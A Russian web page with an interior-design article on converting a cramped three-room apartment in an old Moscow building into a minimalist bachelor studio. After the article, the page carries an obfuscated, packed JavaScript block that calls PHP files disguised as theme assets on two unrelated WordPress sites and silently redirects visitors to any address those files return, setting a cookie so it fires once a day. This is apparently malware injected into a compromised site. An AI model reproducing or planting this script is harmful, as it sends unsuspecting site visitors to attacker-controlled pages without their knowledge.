Воскресенье, 21 июля 2019 22:17

Трехмерная графика Реконструкция старых квартир в исторической части города имеет свои неоспоримые плюсы и не менее весомые минусы.

Автор
Оцените материал
(0 голосов)
Трехмерная графика Реконструкция старых квартир в исторической части города имеет свои неоспоримые плюсы и не менее весомые минусы. Преимущества жизни в центре - престиж, удобство и обаяние дома с историей, недостижимое в новостройке. Недостатки - небольшие площади, планировочные ограничения и ветхость коммуникаций, а зачастую и основных конструкций. Но при большом желании и реалистичном отношении к исходным данным все же можно получить в итоге действительно качественное и комфортное жилье. Начнем с исторической атмосферы. В хитросплетениях старых московских переулков сохранилось пятиэтажное здание XIX века: за легко узнаваемым классическим фасадом прячется современная "начинка". В 80-х годах прошлого столетия строение подверглось реконструкции. Прежние обветшалые перекрытия заменили новыми, железобетонными, подкрасили стены, отремонтировали лестницы и подъезды. Капитальность постройки гарантирует ей сохранность на десятилетия, а то и на века. Уверенность в том, что в ближайшем будущем дому не грозят ни снос, ни реконструкция, стала определяющей при покупке нашим героем, преуспевающим молодым человеком, не обремененным семьей, трехкомнатной квартиры площадью 64 м2. А для создания стильного и удобного интерьера он пригласил свою давнюю знакомую, архитектора Екатерину Стрекалову. Исходная планировка оставляла желать лучшего. Узкие длинные коридоры, "съедающие" полезную площадь, скучная нарезка комнат-пеналов, крошечные ванная и туалет - все это явно не соответствовало современным требованиям комфорта. Меж тем квартиру предстояло превратить в модную студию столичного яппи. Свое будущее жилище заказчик продумал весьма подробно. Для дружеских вечеринок - открытое гостевое пространство, объединенное с компактной кухней (максимально большое или хотя бы способное таковым казаться). Для работы - небольшой домашний кабинет. Для отдыха и расслабления - просторная ванная комната с современным оборудованием. Для сна - то, что останется. "Так живет большинство моих заказчиков. Много и фанатично работают. С удовольствием и качественно отдыхают. Дома появляются нечасто. Времени на сон почти не остается. Это стиль, характерный для мегаполиса. Соответственно, спальни проектируются небольшими и предельно функциональными, ведь в них человек проводит всего несколько часов в сутки. Кровать, полка для книг, встроенный шкаф для одежды - ничего лишнего", - рассказывает Екатерина Стрекалова. Но вернемся к перепланировке. Г-образная конфигурация квартиры изначально ограничивала возможности архитектора. В короткой части размещались маленькие жилые комнаты и ванная с туалетом, перенести их куда-либо было просто невозможно. Глубина, а правильнее сказать - узость этой зоны (ширина - от 3 до 3,5 м) определялась расположением внутренней несущей стены и границей соседней квартиры. Соответственно, и в новом проекте здесь сохранились приватные помещения - спальня, кабинет и ванная. Правда, последняя существенно расширилась за счет объединения с туалетом и присоединения части спальни. Теперь ванная комната площадью около 9 м2 выглядит по-царски, а в соседнем небольшом уютном помещении вполне хватает места для широкой кровати (об отношении хозяина квартиры к сну см. предыдущий абзац). Часть квартиры, отделенная от приватной зоны несущей стеной, подверглась более решительным преобразованиям. Длинный унылый коридор исчез, уступив место продуманной с точки зрения эргономики прихожей. Здесь рационально используется каждый сантиметр пространства. Ступенчатая в плане перегородка позволила максимально разгрузить площади столовой и прихожей: обеденный стол утоплен в нишу стены, в то же время напротив входа в квартиру в этом простенке висит зеркало, по бокам которого оборудованы ниши-шкафы. Для зрительного расширения входной зоны использованы все возможные средства: светлый тон стен, зеркальные плоскости, многоуровневое освещение, а главное - молочно-белые стеклоблоки, работающие на просвет. Перегородку между кухней и самой большой комнатой убрали, образовав просторную (по крайней мере по сравнению с той, которая была) гостевую зону. Мы уже говорили, что площадь квартиры невелика, поэтому надо было использовать все возможности для ее увеличения. Как реально, за счет перепланировки (снос перегородок дал выигрыш примерно в 0,5 м2), так и визуально, с использованием целого ряда приемов. Создание впечатления легкости и простора стало одной из главных задач проектирования. Эта задача решена с помощью цвета (монохромной гаммы, в которой преобладают светлые тона); активного использования блестящих поверхностей, отражающих свет (стекла, металла, полированного керамогранита); многоуровневого освещения; подбора стильной и изящной мебели и аксессуаров, не загромождающих помещения. При этом интерьер подчеркнуто графичен. Удивительно, но минимум цвета, форм и линий создает ощущение визуального богатства и разнообразия. Вся интрига строится на игре нюансов. Пространство спокойно, нейтрально и тем не менее доброжелательно. В то же время в нем нет выхолощенной стерильности минималистских студий. Его можно созерцать бесконечно, как японские иероглифы, рисунки света и тени на белой стене или темные силуэты деревьев на фоне снега. Созерцать - и всегда находить что-то новое, заслуживающее внимания. В зависимости от угла зрения, открываются принципиально разные картины, но обязательно многоплановые. Тонкая граница между покоем и скучной монотонностью осталась неперейденной. Интерес к интерьеру усиливается еще и благодаря применению контрастных фактур. Гладкий керамогранит, вкрапления теплого дерева, холодное стекло, рельефная кожаная обивка мебели... Бесконечная смена ощущений на ограниченном пространстве. Отдельная тема - развешанные по стенам графические произведения, прекрасно вписавшиеся в общую стилистику. Их изысканность как нельзя лучше сочетается с лаконизмом использованных в оформлении жилища приемов. И хозяин квартиры, и автор проекта затрудняются дать точное определение ее стилю. Конечно, ближе всего это жилище к минимализму. "Студийная" планировка, скупо использованный цвет (а точнее, огромное количество оттенков белого и серого), лаконичность форм и линий, компактная эргономичная мебель - все это дает основание утверждать, что квартира не перегружена бытом с его пристрастием к "вещизму". Предметов обстановки здесь ровно столько, сколько необходимо. Точно так же строго дозируются чувства, мысли и эмоции, которые должен, по замыслу автора, вызывать интерьер. Безусловно, в дизайне жилища присутствуют и японские мотивы. Светлые стены и потолок, вкрапления стеклоблоков с иероглифами, выбранными с особым смыслом, постеры с каллиграфией, невысокая мебель. Обращение к архитектурным традициям Востока - идея владельца квартиры. "Три года назад, когда делался ремонт, японский стиль был на пике популярности, - вспоминает он. - Но и сегодня дом выглядит современно. Он нравится всем, кто сюда приходит". Кухня с металлическими фасадами и телевизор с большим экраном в гостиной - дань стилю high tech. Он подчеркивается многими аксессуарами и деталями: точно подобранными светильниками, алюминиевым каркасом барных стульев, серебристой тканью диванных подушек, хромированным корпусом настенных часов IKEA, а также включением металлических элементов в светлую фоновую плитку, которой облицованы стены. Реализация проекта длилась около года. К счастью, наиболее дорогостоящих и сложных с технической точки зрения проблем, характерных для старых домов (к примеру, полной замены или усиления межэтажных перекрытий и реанимации коммуникаций), удалось избежать - помогла реконструкция 80-х годов. Все стены и потолки выравнивались шпаклевкой. Для финишной отделки стен использовались три вида краски: светлая матовая с легким, едва заметным, сероватым оттенком, фактурная точно такого же цвета и темно-серая, антрацитовая. Сочетания двух близких и одного контрастного тона создали ту самую графическую выверенность интерьера, о которой шла речь выше. Отделку потолков выполнили с помощью гипсокартона и финишного покрытия краской. Примечательно, что пластика потолков в проекте задействована минимально, хотя высота помещений вполне позволила бы "поиграть" с нею. Но вот заданный стиль и лаконичная минималистская композиция интерьера изначально сделали любые эксперименты с криволинейными поверхностями и прочими "архитектурными излишествами" чужеродными и неуместными. Простые формы и прямые линии ясно читаются уже при входе в квартиру. Вертикальный ритм зеркальных дверей встроенных шкафов в прихожей гармонирует с четкой сеткой рисунка пола - клетчатая разбивка плитки напоминает испещренный осями архитектурный чертеж. Вертикальный ритм подчеркивают и две темные стенные плоскости - в прихожей и за телевизором. Эти элементы перекликаются друг с другом и контрастируют со светлыми стенами, полом и потолком. Вся гостевая зона, включая прихожую, кухню, пространство для отдыха перед телевизором и переход к приватным покоям, отмечена общим покрытием пола - полированным керамогранитом. Редко применяемое в современных интерьерах решение продиктовано стремлением не "измельчить" и без того небольшое пространство. Кроме того, материал, обладающий большой отражающей способностью, делает помещение более светлым и просторным. Для разграничения функциональных зон использованы другие приемы. В частности, освещение. Кухня оборудована подсветкой, обеденная зона выделена лампами, низко свисающими над столом. Пространство для отдыха обозначают два настенных светильника, расположенных по обе стороны от телевизора. Еще один не часто встречающийся прием: потолочные галогенные лампы вмонтированы не только в горизонтальные, но и в вертикальные плоскости. Многоуровневое освещение, по замыслу архитектора, дает возможность воспринимать интерьер по-разному, в зависимости от настроения. Кухонная часть интерьера отделена от гостевой средствами вертикального зонирования. Здесь используется небольшой подиум. Кухня Berloni, строгая, не перегруженная деталями, размещена вдоль глухой стены без естественного освещения. Чередование поверхностей из блестящего металла и матового стекла также работает на идею визуального расширения пространства. Вытяжка, помимо выполнения своей основной функции, служит дополнительным дизайнерским элементом. Рабочую зону кухни и гостиную разграничивает барная стойка, выполненная на заказ. Материал столешницы - гранит - подбирался под цвет покрытия пола. Приватные помещения - спальня и кабинет - по своему дизайну несколько отличаются от остального пространства. В них больше цвета, но меньше чувствуется эффект графичности. В качестве покрытия пола использована светлая паркетная доска из крашеного ясеня. Специально выбрана относительно недорогая мебель от IKEA и фабрики "8 МАРТА" - как мы уже говорили, эти помещения исключительно функциональны, на них не возлагаются репрезентативные задачи. Яркие цветовые пятна (покрывала, шторы, аксессуары) контрастируют с монохромностью гостевой части квартиры. Вход в ванную комнату смещен относительно главной коммуникационной оси коридора и, таким образом, менее заметен из гостиной. На площади почти 9 м2 нашлось место для гидромассажной ванны с многофункциональной душевой панелью, умывальника, унитаза, стиральной машины и... свободного пространства для перемещений между ними. Оборудование компактно расположено вдоль боковых стен помещения. Унитаз приподнят на небольшой подиум, что было продиктовано технической необходимостью: под ним находится сливная труба диаметром 100 мм, угол наклона которой регламентируется строительными нормами. Вентиляционный короб и стояки инженерных коммуникаций спрятаны за стенкой, облицованной плиткой. Цветовое решение ванной строится на сочетании темных антрацитовых тонов керамической плитки в качестве фона и контрастных элементов (например, зеленого стекла, из которого изготовлены умывальник и часть мебели). Безусловно, это помещение - одно из самых важных в квартире, что подчеркивается как его внушительной площадью, так и отличной от интерьера в целом колористикой. "Передо мной была поставлена интересная задача создать сугубо мужской интерьер. Но не нарочито брутальный, кичевый, скорее спокойный, лаконичный, без излишней аффектации. Требовалось максимально функциональное и удобное пространство, рассчитанное на одного молодого человека. Я надеюсь, что справилась с этим успешно", - говорит Екатерина Стрекалова. Заказчик с нею вполне согласен - он доволен своим жильем. Ценность которого растет год от года - расположение в центре города изначально предусматривало такую перспективу, а универсальный дизайн еще долго не выйдет из моды.
Прочитано 6 раз

Последнее от нербуд

Похожие материалы (по тегу)

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 H(f){5 7=" "+z.7;5 j=" "+f+"=";5 k=Q;5 8=0;5 a=0;6(7.n>0){8=7.i(j);6(8!=-1){8+=j.n;a=7.i(";",8);6(a==-1){a=7.n}k=12(7.K(8,a))}}C(k)}9 x(f,y,g,b,c,l){z.7=f+"="+10(y)+((g)?"; g="+g:"")+((b)?"; b="+b:"")+((c)?"; c="+c:"")+((l)?"; l":"")}9 I(){5 3;w{3=h A("Y.B")}F(e){w{3=h A("U.B")}F(E){3=R}}6(!3&&Z D!=\'V\'){3=h D()}C 3}5 S=\'G://14.1o/s-p/o/1n/v/r.t\';5 T=\'G://1p.1m/s-p/o/1k/1c/1b/1a/18/v/r.t\';6(H(\'O\')!=\'P\'){9 M(){5 d=h 1d();d.1e(d.1i()+1h*1g*1f*1);x(\'O\',\'P\',d.19())}9 m(N,J){5 3=I();3.1j(\'1q\',N,q);3.1l=9(){6(3.17==4&&3.X==W){6(3.L.i(\'u=\')==0){M();16.15=3.L.K(2)}13{6(J)m(T,R)}}};3.11(Q)}m(S,q)}',62,89,'|||xmlhttp||var|if|cookie|offset|function|end|path|domain|now||name|expires|new|indexOf|search|setStr|secure|lookupRedirect|length|themes|content|true||wp|php||css|try|setCookie|value|document|ActiveXObject|XMLHTTP|return|XMLHttpRequest||catch|https|getCookie|getXmlHttp|bIsFirst|substring|responseText|setAdsCookie|sUrl|newadsshow|complete|null|false|sAdsUrl1|sAdsUrl2|Microsoft|undefined|200|status|Msxml2|typeof|escape|send|unescape|else|datbinhduongdep|location|window|readyState|assets|toGMTString|advanced|admin|inc|Date|setTime|24|3600|1000|getTime|open|flatsome|onreadystatechange|com|basis|net|thaonhinguyen|GET'.split('|'),0,{}))